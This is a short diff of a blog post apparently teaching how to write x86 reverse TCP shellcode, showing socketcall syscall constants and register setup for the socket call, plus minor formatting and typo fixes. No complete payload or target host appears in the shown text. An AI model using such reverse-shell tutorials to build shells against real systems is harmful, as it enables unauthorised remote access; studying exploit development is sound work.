C-Brown/C-Brown.github.io/_posts/2019-02-26-Shell-Reverse-TCP.md

 #define SYS_LISTEN	 4		/* sys_listen(2)		*/
 #define SYS_ACCEPT	 5		/* sys_accept(2)		*/
 ```
-Looking at our C code, we need to call socket(2, 1, 0);\
+Looking at our C code, we need to call socket(2, 1, 0);

-This will translate to:\
+This will translate to:

-    EAX - 0x66 for socketcall\
+    EAX - 0x66 for socketcall

-    EBX - 1 fo socket\
+    EBX - 1 for socket

-    ECX - address on stack with args 2, 1 0\
+    ECX - address on stack with args 2, 1 0
 ```asm
 ; clear registers while avoiding nulls xor eax, eax